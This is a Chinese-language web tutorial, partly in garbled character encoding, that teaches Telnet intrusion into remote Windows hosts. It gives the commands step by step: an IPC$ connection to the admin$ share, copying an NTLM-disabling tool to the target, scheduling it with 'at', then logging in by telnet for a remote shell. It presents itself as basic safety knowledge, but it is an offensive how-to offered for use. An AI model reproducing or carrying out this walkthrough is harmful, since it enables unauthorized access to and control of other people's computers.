明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

Telnet入侵指令區(qū)分

發(fā)表時間:2023-07-03 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]簡單介紹關(guān)于NTLM驗證 由于Telnet功能太強大, 而且也是入侵者使用最頻繁的登錄手段之一, 因此微軟公司為Telnet添加了身份驗證, 稱為NTLM驗證, 它要求Telnet終端除...

簡單介紹關(guān)于NTLM驗證

    由于Telnet功能太強大, 而且也是入侵者使用最頻繁的登錄手段之一, 因此微軟公司為Telnet添加了身份驗證, 稱為NTLM驗證, 它要求Telnet終端除了需要有Telnet服務(wù)主機的用戶名和密碼外, 還需要滿足NTLM驗證關(guān)系。 NTLM驗證大大增強了Telnet主機的安全性, 就像一只攔路虎把很多入侵者拒之門外。 (關(guān)于NTLM我有寫一個專門帖子。 。 各位可以去看看)

1.使用telnet連接主機

指令格式(cmd):telnet 192.168.0.0 連接端口號

如果要斷開。 。 就是exit。 。

這個本人寫了一個很詳細(xì)的帖子發(fā)表在黑盟“遠(yuǎn)程開啟telnet“

2.典型telnet入侵攻略

第一步:建立IPC$連接(本人也寫了很詳細(xì)關(guān)于IPC$連接的方法),

第二步:開啟遠(yuǎn)程telnet連接, 首先在cmd(確定此時的根目錄是目標(biāo)的)輸入指令。 。 service  開啟service項目。 。 。 仔細(xì)找找。 。 。 就有Telnet服務(wù)項。 。 。 。 把它打開。 。 。

第三步:取消IPC$連接:net use 192.168.0.0 /del

第四步:去掉NTLM驗證, 如果沒有去除目標(biāo)上的NTLM驗證, 在登錄目標(biāo)的電腦的時候就會失敗。

其實方法有很多種。 。 。 本人就介紹我最常用的一個。 。 也是最簡單的方法吧。 。 。

首先, 在本地計算機上建立一個與遠(yuǎn)程主機上相同的賬號和密碼。

指令:net localgroup alpha /add                    不過確定對方的賬號也是alpha。 。 因為要相同的。 。

第二步:通過“開始”→“程序”→“附件”找到“命令提示符”, 使用鼠標(biāo)右鍵單擊“命令提示符”, 然后選擇“屬性”。

在“以其他用戶身份運行(U)”前面挑上挑。 。 然后點。 。 “確定”接著。 。 仍然按照上述路徑找到“命令提示符”(cmd)。 。 之后用左健打開它。 。 。 。

之后寫上用戶名和密碼。 。 。 alpha的

然后點確定。 。 。 得到cmd shell框。 。 。

之后輸入我們的指令:telnet 192.168.0.0

現(xiàn)在就會顯示一個更新后的cmd shell。 。 這個shell就192.168.0.0上的。 。 。

其實去掉NTLM驗證的方法很多。 。 。 我再介紹給大家一個方法。 。 。

這個方法就是超級菜鳥話。 。 。 因為我們需要用到一個工具。 。 NTLM.exe。 。 這個工具就像是3389.exe一樣。 。 只要把3389.exe傳到一臺機器上去執(zhí)行。 。 那臺機器上的3389端口就會自動打開。 。 。

NTLM.exe的運作概念和3389.exe是一樣的。 。 。 我們需要做的就是把我們的NTLM.exe傳到192.168.0.0這個機器上。 。 。

首先:開cmd。 。

然后輸入指令:net use \\192.168.0.0\ipc$*""\user:administrator

之后再輸入指令:copy c:\NTLM.exe \\192.168.0.0\admin$

解釋一下:\admin$是使用192.168.0.0主機上的admin用戶共享權(quán)限。 。 。 。

然后再輸入察看時間指令:net time \\192.168.0.0

我們假如對方的時間是2007/9/21 下午3點21分。 。 。

之后再輸入執(zhí)行指令:at \\192.168.0.0 15:22 NTLM.exe

解釋一下:15:22是24小時至的下午3點22分。 。 。 cmd shell輸入指令時一定要寫24小時的。 。

之后當(dāng)按回車確定后得到:新增加一項作業(yè)    或者是什么指令成功完成的提示字后。 。 。 等待1分鐘。 。 。 讓cmd完成我們的shell command。 。 。

之后我們再輸入指令:telnet 192.168.0.0

Ok.........................大功告成。 。 。 。

如果要恢復(fù)NTLM驗證。 。 。 我們要用到一個shell工具:resumetelnet.exe

resumetelnet.exe使用的方法是這樣的。 。 。

命令格式:ResumeTelnet.exe \\\\server name password

其中server name是主機域名或者是IP都可以。 。 。 我們就寫192.168.0.0

password當(dāng)然就是密碼了。 。 。 。

回車確定。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 當(dāng)顯示the command completed successfully后。 。 一切完成。 。 。 。 。 。 。 。 。 。 。 。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費電腦中毒的煩擾。